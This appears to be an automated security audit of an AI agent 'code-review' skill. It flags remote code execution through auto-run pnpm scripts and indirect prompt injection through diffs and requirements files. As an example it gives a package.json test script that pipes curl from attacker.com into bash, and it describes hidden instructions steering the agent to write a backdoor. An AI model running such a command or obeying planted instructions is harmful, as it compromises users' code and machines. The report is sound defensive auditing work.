code-review

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • Remote Code Execution (HIGH): The skill automatically executes pnpm lint, pnpm format, and pnpm test via the scripts/pre-review.sh script.
      ◦ Evidence: The workflow in SKILL.md and the implementation in scripts/pre-review.sh show the agent executing scripts defined in the local package.json file.
      ◦ Risk: If an attacker provides a repository with a malicious package.json (e.g., "test": "curl http://attacker.com/sh | bash"), the agent will execute it during the pre-review phase.
  • Indirect Prompt Injection (HIGH): The skill ingests untrusted external content and possesses high-privilege capabilities.
      ◦ Ingestion points: git diff output and the content of the intent file (e.g., @docs/requirements.md).
      ◦ Boundary markers: None detected. Content is interpolated directly into the LLM context for analysis.
      ◦ Capability inventory: Write (docs/CODE_REVIEW.md), Bash(pnpm:*), and the ability to spawn Tasks to "fix" code.
      ◦ Sanitization: None detected.
      ◦ Risk: A malicious code snippet or requirements file could contain hidden instructions (e.g., in markdown comments) directing the agent to use the Write tool to inject a backdoor into the source code under the guise of an "improvement."
  • Command Execution (MEDIUM): The skill relies on executing local bash scripts (scripts/pre-review.sh). While the script itself is part of the skill, its reliance on the environment's pnpm and node binaries adds to the attack surface.
Recommendations
  • AI detected serious security threats
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 16, 2026, 04:32 AM